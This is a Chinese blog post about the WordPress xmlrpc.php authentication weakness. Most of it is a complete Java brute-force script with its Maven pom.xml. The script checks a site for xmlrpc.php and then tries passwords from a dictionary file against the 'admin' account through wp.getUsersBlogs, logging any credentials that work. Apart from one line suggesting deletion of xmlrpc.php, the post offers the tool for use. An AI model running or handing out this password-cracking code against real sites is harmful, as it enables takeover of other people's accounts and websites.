wordpress是很流行的开源博客,它提供远程发布文章的方法,就是使用跟路径的xmlrpc.php这个文件,最近爆出xmlrpc漏洞,漏洞原理是通过xmlrpc进行认证,即使认证失败,也不会被Wordpress安装的安全插件记录,所以不会触发密码输错N次被锁定的情况。因此就可能被暴力破解,如果密码又是弱口令的话,就相当危险了。最简单的解决办法,就是删除xmlrpc.php这个文件。闲来无事,用java写了暴力破解的脚本,其实就是拿着各种用户名、密码去不断调用xmlrpc.phpp这个文件,检测认证结果,很简单。只为娱乐,暴力破解的事情,大家慎重。
Xmlrpc.java源码如下:
package com.yeetrack.security.wordpress;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.annotations.Test;
import java.io.*;
/**
* Created by victor wang on 2014/8/2.
* 利用wordpress xmlrpc漏洞,暴力破解密码
*/
public class Xmlrpc
{
private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)
.setSocketTimeout(4000).build();
private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
private CloseableHttpClient httpClient = HttpClients.custom()
.setUserAgent(userAgent)
.setDefaultRequestConfig(requestConfig)
.build();
/**
* 校验域名是否存在xmlrpc.php这个文件
*/
private boolean checkXmlRpcFile(String domain)
{
domain = wrapperUrl(domain);
if(domain==null)
return false;
HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");
get.addHeader("User-Agent", userAgent);
CloseableHttpResponse response = null;
String resultString = null;
try {
response = httpClient.execute(get);
if(null == response || response.equals(""))
return false;
resultString = EntityUtils.toString(response.getEntity());
} catch (IOException e) {
e.printStackTrace();
}
return resultString.contains("XML-RPC server accepts POST requests only.");
}
/**
* 暴力尝试
*/
private boolean forceLogin(String username, String password, String url)
{
//尝试登录
HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");
post.addHeader("User-Agent", userAgent);
String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>"+username+"</value></param> <param><value>"+password+"</value></param> </params></methodCall>";
StringEntity entity = null;
try {
entity = new StringEntity(xmlString);
post.setEntity(entity);
CloseableHttpResponse response = httpClient.execute(post);
String loginResult = EntityUtils.toString(response.getEntity());
if(null== loginResult || loginResult.equals(""))
return false;
if(loginResult.contains("isAdmin")) {
logger.info(url + "登录成功,userename--->" + username + " password--->" + password);
return true;
}
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
} catch (ClientProtocolException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return false;
}
/**
* 净化url,去掉http://或者末尾的path
*/
private String wrapperUrl(String url)
{
if(null == url || url.equals(""))
return null;
if(url.startsWith("http://"))
url = url.substring(7);
if(url.contains("/"))
url = url.substring(0, url.indexOf("/"));
return url;
}
/**
* 破解
*/
@Test
public void test()
{
String url = "http://somewordpress.com/xmlrpc.php";
if(!checkXmlRpcFile(url)) {
logger.info(url+"--->不存在xmlrpc漏洞");
return;
}
File file = new File("src/main/resources/1pass00.txt"); //密码字典,这个网上一堆一堆的,或者自己生成也可
try {
FileReader fileReader = new FileReader(file);
BufferedReader bufferedReader = new BufferedReader(fileReader);
String line = null;
int count = 1;
while ((line = bufferedReader.readLine()) != null) {
System.out.println("" + count + " " + line);
if(forceLogin("admin", line, url))
break;
count++;
//Thread.sleep(500);
}
} catch (Exception e) { e.printStackTrace(); }
}
}
项目使用maven管理,使用了apache的httpclient和log4j,pom.xml代码如下:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.yeetrack.security</groupId>
<artifactId>wordpress-xmlrpc</artifactId>
<version>1.0-SNAPSHOT</version>
<dependencies>
<dependency>
<groupId>org.apache.httpcomponents</groupId>
<artifactId>httpclient</artifactId>
<version>4.4-alpha1</version>
</dependency>
<dependency>
<groupId>org.apache.httpcomponents</groupId>
<artifactId>httpmime</artifactId>
<version>4.4-alpha1</version>
</dependency>
<dependency>
<groupId>org.testng</groupId>
<artifactId>testng</artifactId>
<version>6.8.8</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-log4j12</artifactId>
<version>1.7.7</version>
</dependency>
</dependencies>
</project>版权声明
本站文章、图片、视频等(除转载外),均采用知识共享署名 4.0 国际许可协议(CC BY-NC-SA 4.0),转载请注明出处、非商业性使用、并且以相同协议共享。
© 空空博客,本文链接:https://www.yeetrack.com/?p=952
近期评论